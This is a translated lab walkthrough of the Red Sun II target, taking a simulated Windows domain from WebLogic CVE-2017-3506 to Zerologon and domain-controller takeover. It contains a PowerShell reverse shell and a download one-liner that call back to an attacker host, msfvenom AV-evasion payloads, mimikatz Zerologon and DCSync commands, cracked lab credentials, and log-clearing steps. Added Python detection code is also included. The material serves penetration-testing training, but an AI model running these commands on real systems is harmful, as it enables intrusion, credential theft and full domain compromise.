Red Sun Target II
Environment Setup
Simply put the virtual machines' host-only NIC on the 10.10.10.0 segment, configured as follows:

Put the NAT NIC on the 192.168.96.0 segment, as follows:

First revert to the v1.3 snapshot, click Discard, then reboot and log in as a different user with the credentials .\de1ay:1qaz@WSX.
The password has expired; change it and the login succeeds.
When finished, start the WebLogic service on the WEB server from
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
running it as administrator.
Setup is complete; now log in to Kali.
I. nmap scanning
1) Host discovery
sudo nmap -sn -o hosts 192.168.111.0/24
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.111.80
Host is up (0.00013s latency).
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap scan report for 192.168.111.201
We see that 192.168.111.201 and 192.168.111.80 are the newly added IPs.
2) Port Discovery
192.168.111.80
sudo nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports
Starting Nmap 7.93 ( ) at 2024-09-24 16:09 CST
Nmap scan report for 192.168.111.80
Host is up (0.00040s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
7001/tcp open afs3-callback
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49175/tcp open unknown
49261/tcp open unknown
60966/tcp open unknown
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds
192.168.111.201
sudo nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 201_ports
Starting Nmap 7.93 ( ) at 2024-09-24 16:04 CST
Nmap scan report for 192.168.111.201
Host is up (0.00045s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49178/tcp open unknown
MAC Address: 00:0C:29:84:B4:3E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
We see that the 192.168.111.80 machine has ports 80 and 7001 open, which is obviously interesting: the web attack surface is broad, and 7001 is WebLogic's default port. We therefore run a detailed scan against 192.168.111.80.
3) Detailed information scanning
First we extract the open ports, which makes the detailed scan faster and more accurate.
Copy the open ports into the ports variable:
ports=$(cat 80_ports | grep open | awk -F/ '{print $1}' | paste -sd ,)
Typing $ports and pressing Tab expands the list.
sudo nmap -sT -sV -sC -O -p$ports 192.168.111.80 -o details
# Nmap 7.93 scan initiated Tue Sep 24 16:18:25 2024 as: nmap -sT -sV -sC -O -p80,135,139,445,1433,3389,7001,49152,49153,49154,49175,49261,60966 -o details 192.168.111.80
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| 192.168.111.80:1433:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name:
| DNS_Computer_Name: WEB.
| DNS_Tree_Name:
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.
| Not valid before: 2024-09-23T07:46:09
|_Not valid after: 2025-03-25T07:46:09
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name:
| DNS_Computer_Name: WEB.
| DNS_Tree_Name:
| Product_Version: 6.1.7601
|_ System_Time: 2024-09-24T08:19:51+00:00
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
49261/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| 192.168.111.80:60966:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name:
| DNS_Computer_Name: WEB.
| DNS_Tree_Name:
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
| ms-sql-info:
| 192.168.111.80:60966:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 60966
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at /cgi-bin/?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=9/24%Time=66F275DE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\0\x0
SF:2\0\0\0");
MAC Address: 00:0C:29:BE:34:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name:
| Forest name:
| FQDN: WEB.
|_ System time: 2024-09-24T16:19:55+08:00
|_clock-skew: mean: -53m19s, deviation: 2h39m58s, median: 0s
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-09-24T08:19:54
|_ start_date: 2024-09-24T07:53:08
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Tue Sep 24 16:20:30 2024 -- 1 IP address (1 host up) scanned in 124.83 seconds
We see that 7001 is the WebLogic service.
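As an added example (not part of the original post), the following Python script does what the `ports=$(...)` pipeline in step 3 does, parsing nmap normal output into a comma-separated port list, and then flags the exposures a defender would look at first in the detailed scan above. The sample text is a constructed excerpt of that output, and the exposure heuristics are this example's own, not nmap's.

```python
# Added example (not from the original post): parse nmap "normal" (-oN) output,
# rebuild the comma-separated port list used for the follow-up -p scan, and
# flag the services a defender would want to look at first. The sample text is
# a constructed excerpt of the scan output shown above (the 8080 line is added
# to show that "open|filtered" is not counted as open).
import re
from typing import Dict, List

NMAP_NORMAL_OUTPUT = """\
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
445/tcp   open  microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
3389/tcp  open  ms-wbt-server?
7001/tcp  open  http          Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open  msrpc         Microsoft Windows RPC
8080/tcp  open|filtered http-proxy
"""

# Only lines whose state is exactly "open" count; "open|filtered" is excluded,
# which a plain `grep open` would not do.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_open_ports(text: str) -> List[Dict[str, str]]:
    """Return one dict per open port: port, proto, service, version."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            found.append({"port": m.group(1), "proto": m.group(2),
                          "service": m.group(3), "version": m.group(4).strip()})
    return found

def port_list(text: str) -> str:
    """Comma-separated list, the same value the `ports=$(...)` pipeline builds."""
    return ",".join(p["port"] for p in parse_open_ports(text))

def exposure_notes(text: str) -> Dict[str, str]:
    """Heuristic triage notes keyed by port (this example's own rules, not a
    vulnerability scan): they only say where to look closer and what to harden."""
    notes = {}
    for p in parse_open_ports(text):
        banner = p["version"].lower()
        if "weblogic" in banner and "t3 enabled" in banner:
            notes[p["port"]] = "WebLogic with T3 enabled: restrict T3 with a connection filter or firewall"
        elif p["service"] == "ms-sql-s":
            notes[p["port"]] = "SQL Server reachable from the network: restrict to application hosts"
        elif p["service"] == "microsoft-ds":
            notes[p["port"]] = "SMB exposed: require SMB signing and restrict reachability"
        elif p["service"].startswith("ms-wbt-server"):
            notes[p["port"]] = "RDP exposed: require NLA and restrict source addresses"
    return notes
```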
II. Web Penetration
Open the page on port 80
It is a blank page, so we set 80 aside.
Open port 7001
Seeing that there is content, we visit WebLogic's default login page:
http://192.168.111.80:7001/console/login/
The bottom-left corner reveals the WebLogic version: 10.3.6.0
Enumerate vulnerabilities with weblogicScanner:
git clone /0xn0ne/
cd weblogicScanner
python -t 192.168.111.80:7001
[20:35:09][INFO] [!][CVE-2019-2890][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [!][CVE-2017-3248][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [-][CVE-2017-3248][192.168.111.80:7001] Not vulnerability.
[20:35:09][INFO] [-][CVE-2019-2890][192.168.111.80:7001] Not vulnerability.
[20:35:10][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module, Please verify manually!
[20:35:10][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[20:35:11][INFO] [!][CVE-2018-2893][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [!][CVE-2018-2628][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [-][CVE-2018-2628][192.168.111.80:7001] Not vulnerability.
[20:35:11][INFO] [-][CVE-2018-2893][192.168.111.80:7001] Not vulnerability.
[20:35:12][INFO] [!][CVE-2020-14882][192.168.111.80:7001] Connection error.
[20:35:12][INFO] [-][CVE-2020-14882][192.168.111.80:7001] Not vulnerability.
[20:35:13][INFO] [-][CVE-2017-10271][192.168.111.80:7001] Not vulnerability.
[20:35:14][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module, Please verify manually!
[20:35:15][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[20:35:19][INFO] [-][CVE-2020-2883][192.168.111.80:7001] Not vulnerability.
[20:35:19][INFO] [-][CVE-2018-3191][192.168.111.80:7001] Not vulnerability.
[20:35:20][INFO] [-][CVE-2020-2555][192.168.111.80:7001] Not vulnerability.
[20:35:21][INFO] [!][CVE-2020-2551][192.168.111.80:7001] Connection error.
[20:35:21][INFO] [-][CVE-2020-2551][192.168.111.80:7001] Not found.
[20:35:23][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module, Please verify manually!
[20:35:24][INFO] [+][CVE-2016-3510][192.168.111.80:7001] Exists vulnerability!
[20:35:24][INFO] [-][CVE-2016-0638][192.168.111.80:7001] Not vulnerability.
[20:35:24][INFO] [+][CVE-2020-14750][192.168.111.80:7001] Exists vulnerability!
[20:35:25][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[20:35:27][INFO] [-][CVE-2019-2729][192.168.111.80:7001] Not vulnerability.
[20:35:30][INFO] [-][Weblogic Console][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2018-2894][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2020-14883][192.168.111.80:7001] Not vulnerability.
[20:35:32][INFO] [-][CVE-2018-3252][192.168.111.80:7001] Not found.
Run completed, 30 seconds total.
Filter the results.
cat | grep + | sed -e 's/\[//g' | sed 's/\]/ /g'|awk '{print $4" " $6" " $7}'
CVE-2019-2618 Found module,
CVE-2017-3506 Exists vulnerability!
CVE-2019-2888 Found module,
CVE-2019-2725 Exists vulnerability!
CVE-2014-4210 Found module,
CVE-2016-3510 Exists vulnerability!
CVE-2020-14750 Exists vulnerability!
CVE-2018-3245 Exists vulnerability!
Eight are reported as existing or needing manual verification; there is no shortcut, so we try them one by one.
python url username password
We see that authentication information is required; naturally we prioritize according to each vulnerability's preconditions.
Trying CVE-2017-3506 succeeds.
GitHub address: /Al1ex/CVE-2017-3506
Open the link.
We see the username web\de1ay.
III. Gaining a foothold
Reverse shell
powershell -nop -c "$client = New-Object ('192.168.111.10', 4444);$stream = $();[byte[]]$bytes = 0..65535|%{0};while(($i = $($bytes, 0, $)) -ne 0){;$data = (New-Object -TypeName ).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([]::ASCII).GetBytes($sendback2);$($sendbyte,0,$);$()};$()"
URL-encoded:
powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%('192.168.111.10'%2C%204444)%3B%24stream%20%3D%20%()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%(%24bytes%2C%200%2C%20%))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%(%24sendbyte%2C0%2C%)%3B%()%7D%3B%()%22
The shell connects back to Kali successfully.
Execute:
tasklist /svc
We can see a 360 process, so 360 antivirus software is presumably installed.
IV. AV evasion
1) Getting a CS beacon
Generating an evasive CS payload
We use the BypassAV plugin to make the payload that brings CS online evade antivirus.
BypassAV: /hack2fun/BypassAV
Because this is a lab target running in a virtual environment, some of 360 antivirus's functions are defective, so the basic evasion done with the CS plugin passes. This is for reference only.
git clone /hack2fun/
Import it into CS.
Imported successfully.
Generate an evasive program with BypassAV.
Select a CS listener.
Start a Python web server on Kali:
python -m
In the reverse shell, execute:
powershell iex(new-object ).downloadfile('http://192.168.111.10:8000/','c:\programdata\')
Brief explanation: iex (Invoke-Expression) executes the string as a command, WebClient sends the HTTP request, and the file is downloaded into the machine's ProgramData directory.
The request succeeds, but our shell dies; terminate the shell and connect back again.
We see the payload we uploaded.
Run it:
.\
CS beacon online successfully.
2) Getting an MSF session
a) Direct handoff (failed)
Migrating the CS session to MSF
In MSF:
use exploit/multi/handler
msf6 exploit(multi/handler) > set Lhost 192.168.111.10
Lhost => 192.168.111.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
In CS:
Add a foreign listener

Right-click and select Spawn.
Select the foreign listener just created.
We see it fails; presumably it is blocked by 360.
b) MSF obfuscation (success)
Look at the encoders:
msfvenom -l encoder | grep x64
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
Generate an MSF payload with basic evasion:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.10 LPORT=4444 -e x64/xor_dynamic -f exe -o
This is only simple obfuscation with msfvenom's own parameters. This is a lab target, just an abstraction of a real environment; it is not worth spending a long time building real AV evasion.
Upload
Here the reverse shell's port conflicts with the MSF payload's listening port, so I switched to nc's listening port.
Execute
Meterpreter session acquired successfully.
V. Privilege escalation
1) CS privilege escalation
In CS it is relatively simple: the TaoWu plugin's privilege-escalation module does the job directly.

Click through the entries one by one; at MS14-058 the escalation succeeds.
2) MSF privilege escalation
In MSF, escalation is a bit more tedious.
View the escalation modules in MSF:
search platform:windows type:exploit local
There are many escalation exploits, so picking one tests our experience.
Below is a list of common escalation vulnerabilities we can try, each labelled with whether it succeeded.
a) getsystem (failed)
With Meterpreter in hand, we naturally try getsystem first.
No escalation was obtained.
b) ms16_032 (failed)
secondary_logon_handle_privesc: exploits a vulnerability in the Windows Secondary Logon service.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > use windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 6
session => 6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[+] Compressed size: 1160
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[+] Deleted
[*] Exploit completed, but no session was created.
c) ms14_058 (success)
ms14_058_track_popup_menu: exploits CVE-2014-6324 in Windows; the vulnerability allows an attacker with a least-privileged user session to elevate to administrator level.
The connection was re-established here, so the session id changed.
use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) >set session 2
session => 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4672 launched.
[*] Reflectively injecting the DLL into 4672...
[*] Sending stage (201798 bytes) to 192.168.111.80
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (192.168.111.10:4444 -> 192.168.111.80:63084) at 2024-09-26 15:09:59 +0800
meterpreter >
The escalation succeeded.
d) bypassuac (failed)
There are many more methods; try them yourself if interested.
VI. Lateral penetration
1) Domain controller discovery
Run mimikatz.
Credentials seen: de1ay:hongrisec@2024, mssql:1qaz@WSX
Discover hosts with portscan.
Two live hosts seen: 10.10.10.10 and 10.10.10.201.
The scan also shows some of the ports they have open:
10.10.10.201:3389
[+] received output:
10.10.10.201:139
10.10.10.201:135
10.10.10.10:5985
[+] received output:
10.10.10.10:3389
[+] received output:
10.10.10.10:636
10.10.10.10:593
[+] received output:
10.10.10.10:464
[+] received output:
10.10.10.10:389
[+] received output:
10.10.10.10:139
10.10.10.10:135
[+] received output:
10.10.10.10:88
[+] received output:
10.10.10.10:53
[+] received output:
10.10.10.10:445
10.10.10.201:445
In the CS beacon we can use ping -a to see the host's name:
shell ping -a -n 1 10.10.10.10
shell ping -a -n 1 10.10.10.201
We see that 10.10.10.10 is named DC, so it is most likely the domain controller, whereas 10.10.10.201's request timed out, so we cannot identify it yet.
2) Vulnerability detection
Detecting the Zerologon vulnerability on the domain controller
A brief introduction to Zerologon:
Numbered CVE-2020-1472, it refers to the following: when a NetLogon secure channel is established to the domain controller, flaws in the cryptographic part of the authentication protocol let an attacker set the domain controller's password to empty, then obtain password hashes and ultimately take full control of the domain controller.
The NetLogon component is an important Windows component used to authenticate users and machines on a domain network, replicate the database for domain-controller backups, and maintain the relationships between domain members and the domain, between the domain and its domain controllers, and between DCs within a domain and across domains.
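As an added example (not part of the original post), here is a defender-side correlation of the two traces the Zerologon chain leaves in a domain controller's Security log: a 4742 computer-account password change by ANONYMOUS LOGON, followed by a 4662 replication request from that same account. The events are constructed, the field names follow Windows Security EventData, and the rule names and the "user account" heuristic are assumptions of this example.

```python
# Added example (not from the original post): a defender-side correlation of
# the traces the Zerologon chain leaves in a domain controller's Security log.
# The events are constructed for illustration; field names follow the EventData
# of Windows Security events 4742 and 4662 as exported to JSON.
from typing import Dict, List, Tuple

# Control access right used by directory replication; a 4662 naming it in
# Properties is a replication (DCSync-style) request.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"

Event = Dict[str, str]

SAMPLE_EVENTS: List[Event] = [   # constructed, in chronological order
    # Benign: a workstation rotating its own machine-account password.
    {"EventID": "4742", "SubjectUserName": "PC7$", "TargetUserName": "PC7$",
     "PasswordLastSet": "9/24/2024 8:10:02 AM"},
    # Benign: replication between domain controllers.
    {"EventID": "4662", "SubjectUserName": "DC2$",
     "Properties": "{" + DS_REPLICATION_GET_CHANGES + "}"},
    # Zerologon: the DC account's password set by an unauthenticated caller
    # (what NetrServerPasswordSet2 over the broken channel produces).
    {"EventID": "4742", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC$", "PasswordLastSet": "9/24/2024 8:19:54 AM"},
    # DCSync with the just-reset DC$ account, as in the /authuser:DC$ command.
    {"EventID": "4662", "SubjectUserName": "DC$",
     "Properties": "{" + DS_REPLICATION_GET_CHANGES + "}"},
    # DCSync by an ordinary user account.
    {"EventID": "4662", "SubjectUserName": "de1ay",
     "Properties": "{" + DS_REPLICATION_GET_CHANGES + "}"},
]

def is_anonymous_machine_password_reset(ev: Event) -> bool:
    """4742: a computer account's password set by ANONYMOUS LOGON."""
    return (ev.get("EventID") == "4742"
            and ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"
            and ev.get("TargetUserName", "").endswith("$")
            and bool(ev.get("PasswordLastSet")))

def is_replication_request(ev: Event) -> bool:
    """4662 whose Properties include the replication control-access GUID."""
    return (ev.get("EventID") == "4662"
            and DS_REPLICATION_GET_CHANGES in ev.get("Properties", "").lower())

def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, account) findings; events must be in chronological order."""
    findings: List[Tuple[str, str]] = []
    reset_accounts = set()   # machine accounts reset anonymously so far
    for ev in events:
        if is_anonymous_machine_password_reset(ev):
            acct = ev["TargetUserName"]
            reset_accounts.add(acct.upper())
            findings.append(("zerologon_password_reset", acct))
        elif is_replication_request(ev):
            acct = ev.get("SubjectUserName", "")
            if acct.upper() in reset_accounts:
                # Replication by an account whose password was just reset anonymously.
                findings.append(("dcsync_after_zerologon", acct))
            elif not acct.endswith("$"):
                # Replication rights exercised by a user account rather than a DC.
                findings.append(("dcsync_by_user_account", acct))
    return findings
```

On a real DC the 4742 from Zerologon also changes the DC's own machine password, so a matching 4742 without any preceding trust change is worth paging on by itself.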
Execute in the CS beacon:
mimikatz lsadump::zerologon /target:DC. /account:DC$
beacon> mimikatz lsadump::zerologon /target:DC. /account:DC$
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC. /account:DC$ command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.
Account: DC$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
================================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerable
We see that the Zerologon vulnerability is present.
3) Exploitation
mimikatz lsadump::zerologon /target:DC. /account:DC$ /exploit
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC. /account:DC$ /exploit command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.
Account: DC$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
==============================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
We see Set password : OK.
Now launch a DCSync attack to obtain the domain user's hash:
mimikatz lsadump::dcsync /domain: /dc:DC. /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm
[+] host called home, sent: 750705 bytes
[+] received output:
[DC] '' will be the domain
[DC] 'DC.' will be the DC server
[DC] 'administrator' will be the user account
[AUTH] Username: DC$
[AUTH] Domain : de1ay
[AUTH] Password:
[AUTH] Explicit NTLM Mode
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2019/9/9 10:40:33
Object Security ID : S-1-5-21-2756371121-2868759905-3853650604-500
Object Relative ID : 500
Credentials:
Hash NTLM: 161cff084477fe596a5db81874498a24
We see Hash NTLM: 161cff084477fe596a5db81874498a24, which is the administrator's hash.
Take it to Kali and crack it:
hashcat creds /usr/share/wordlists/ -m 1000
We see the credential information:
administrator:1qaz@WSX
Add it to CS: open Credentials and click Add.
Add completed.
4) Lateral movement
a) Domain controller
Add a listener on 192.168.111.80, named DC.
Go to Targets and select the domain controller.
Select the credentials and listener just added.
The domain controller comes online successfully.
We see that it is the domain controller's SYSTEM privileges.
b) Other machines
Once domain controller access is in hand, the remaining host is just a direct psexec jump.
For the session, select the domain controller.
We see 10.10.10.201 come online as the SYSTEM user.
VII. Persistence
I summarized this in a previous post; see my article for details:
Summary of Windows Privilege Maintenance
This can of course also be done with the CS plugin.

VIII. Clearing traces
The main work is deleting the logs generated during the attack and the files uploaded for the intrusion.
In the CS plugin it is possible to delete the system logs.

Summary
- Scanning with nmap revealed the addresses of the two target machines; a port scan of each showed that 192.168.111.80 had ports 80 and 7001 open while the other did not, so the 80 machine was clearly the one to penetrate first.
- Visiting ports 80 and 7001 showed that 7001 is the default WebLogic service, and the weblogicScanner enumeration tool reported many possible vulnerabilities for this version; trying them one by one, we finally obtained a shell on the web machine.
- After gaining access to the web machine, we found 360 antivirus running in the process list; after simple evasion of the payload generated by CS (MSF), it came online in CS (MSF) successfully.
- Privilege escalation on the system succeeded using the frameworks' privilege-escalation modules.
- Running mimikatz's Zerologon module detected the vulnerability on the domain controller; exploiting Zerologon, we moved laterally to the domain controller and gained SYSTEM privileges there. Using the domain controller's credentials, we also gained SYSTEM privileges on the other host in the domain.